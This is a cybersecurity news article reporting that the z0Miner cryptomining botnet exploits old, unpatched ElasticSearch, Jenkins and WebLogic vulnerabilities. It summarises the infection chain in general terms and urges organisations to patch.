Connect with us

Hi, what are you looking for?

Cyber Security

Cryptomining Botnet Targets Unpatched Vulnerabilities in Cloud Servers

Attackers often keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers by exploiting a new set of unpatched vulnerabilities.

z0Miner active campaign

Qihoo 360 Netlab researchers have observed z0Miner’s active hunting against vulnerabilities addressed in 2015 and earlier in ElasticSearch and Jenkins servers.

  • The botnet was using exploits targeting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers.
  • After compromising a server, the malware will first download a malicious shell script and sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin.
  • Further, the botnet downloads a mining kit containing an XMRig miner script (java.exe), a config file (config.json), and a starter script (solr.sh). It starts to mine for Monero (XMR) cryptocurrency in the background.

Earlier campaigns

Since its emergence last year, z0Miner has been observed gaining persistence via crontab and mining for Monero cryptocurrency.

  • According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices.
  • In addition, the botnet was spreading laterally on the network of already compromised devices via SSH.
  • It has already compromised thousands of devices using recently identified similar attack logic.

Conclusion

z0Miner’s recent campaign demonstrates how vulnerabilities identified years ago, if not patched, can be used by cybercriminals for making a profit. Therefore, it becomes important for organizations to keep all their systems and applications updated with the latest patches to avoid such threats.

Source: https://cyware.com/news/cryptomining-botnet-targets-unpatched-vulnerabilities-in-cloud-servers-29f9f8a3

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

A new Mirai botnet variant tracked as ‘V3G4’ targets 13 vulnerabilities in Linux-based servers and IoT devices to use in DDoS (distributed denial of...

Cyber Security

The Glupteba malware botnet has sprung back into action, infecting devices worldwide after its operation was disrupted by Google almost a year ago. In...

Cyber Security

While monitoring the Emotet botnet’s current activity, security researchers found that the Quantum and BlackCat ransomware gangs are now using the malware to deploy...

Cyber Security

A recently discovered cryptomining botnet is actively scanning for vulnerable Windows and Linux enterprise servers and infecting them with Monero (XMRig) miner and self-spreader malware payloads....

Copyright © 2023 Newsworthy News | Global | Political | Local | All News | Website By: Top Search SEO